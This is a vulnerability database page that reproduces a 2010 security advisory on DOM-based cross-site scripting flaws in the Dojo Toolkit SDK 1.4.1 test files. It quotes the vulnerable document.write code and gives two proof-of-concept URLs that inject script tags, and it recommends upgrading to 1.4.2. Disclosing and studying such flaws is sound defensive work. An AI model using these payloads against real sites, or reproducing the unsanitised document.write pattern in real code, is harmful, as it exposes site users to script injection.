Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Dojo Toolkit SDK v1.4.1 Cross Site Scripting Vulnerability

🗓️ 16 Mar 2010 00:00:00Reported by Adam BixbyType 
zdt
 zdt🔗 0day.today👁 41 Views

Dojo Toolkit SDK v1.4.1 Cross Site Scripting Vulnerability in Multiple DOM-Based XS

Code
==========================================================
Dojo Toolkit SDK v1.4.1 Cross Site Scripting Vulnerability
==========================================================

===========================================================
Multiple DOM-Based XSS in Dojo Toolkit SDK 
Public Release Date: 3/12/2010
Adam Bixby - Gotham Digital Science ([email protected]) 
Affected Software:  Dojo Toolkit SDK <= Build 1.4.1 
Browser used for testing: IE8 (8.0.7600.16385)
Severity: High
===========================================================
1. Summary
===========================================================

The Dojo Toolkit is an open source modular JavaScript library/toolkit designed to ease the rapid development of cross platform, JavaScript/Ajax based applications and web sites.  Multiple instances of DOM-based Cross Site Scripting (XSS) vulnerabilities were found in the _testCommon.js and runner.html files within the SDK.  The XSS vulnerabilities appear to affect all websites that deploy any of the affected SDK files.  These files are designed for testing, however a Google search identified numerous sites which have deployed these files along with the core framework components.

More information on DOM-based XSS can be found at http://www.owasp.org/index.php/DOM_Based_XSS.

The vendor (Dojo Foundation) was notified of this issue on February 19, 2010.  The vendor responded by releasing version 1.4.2 on March 12, 2010 and has also issued a security bulletin: http://dojotoolkit.org/blog/post/dylan/2010/03/dojo-security-advisory/.
 

===========================================================
2. Technical Details
===========================================================

File: dojo-release-1.4.1-src\dojo-release-1.4.1-src\dijit\tests\_testCommon.js
1) Data enters via "theme" URL parameter through the window.location.href property.
Line 25:
var str = window.location.href.substr(window.location.href.indexOf("?")+1).split(/#/);
  ..snip..
2) The "theme" variable with user-controllable input is then passed into "themeCss" and "themeCssRtl" which is then passed to document.write(). Writing the un-validated data to HTML creates the XSS exposure.
Line 54:
  ..snip..
var themeCss = d.moduleUrl("dijit.themes",theme+"/"+theme+".css");
var themeCssRtl = d.moduleUrl("dijit.themes",theme+"/"+theme+"_rtl.css");
document.write('<link rel="stylesheet" type="text/css" href="'+themeCss+'">'); 
document.write('<link rel="stylesheet" type="text/css" href="'+themeCssRtl+'">');
 

===========================================================

File: dojo-release-1.4.1-src\dojo-release-1.4.1-src\util\doh\runner.html
1) Data enters via "dojoUrl" or "testUrl" URL parameters through the window.location.search property.
Line 40:
var qstr = window.location.search.substr(1);
  ..snip..
2) The "dojoUrl" and "testUrl" variables with user-controllable input are passed to document.write(). Writing the un-validated data to HTML creates the XSS exposure.
Line 64:
document.write("<scr"+"ipt type='text/javascript' djConfig='isDebug: true' src='"+dojoUrl+"'></scr"+"ipt>");
  ..snip..
document.write("<scr"+"ipt type='text/javascript' src='"+testUrl+".js'></scr"+"ipt>");


===========================================================
3. Proof-of-Concept Exploit
===========================================================

This vulnerability can be exploited against websites that have deployed any of the 145 SDK files which reference _testCommon.js.

Reproduction Request:
http://WebApp/dijit/tests/form/test_Button.html?theme="/><script>alert(/xss/)</script>

(Note: test_Button.html is one of the SDK files that includes the _testCommon.js file)

============================================================

This vulnerability can be exploited against any website that has deployed the runner.html file.

Reproduction Request:
http://WebApp/util/doh/runner.html?dojoUrl='/>foo</script><'"<script>alert(/xss/)</script>
 

===========================================================
4. Recommendation
===========================================================

Update to Dojo Toolkit SDK 1.4.2

===========================================================



#  0day.today [2018-02-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Mar 2010 00:00Current
7.1High risk
Vulners AI Score7.1
dojo toolkitcross site scriptingdom-based xsssecurity advisoryjavascript libraryvulnerabilityvendor notificationsecurity bulletinproof of concept
41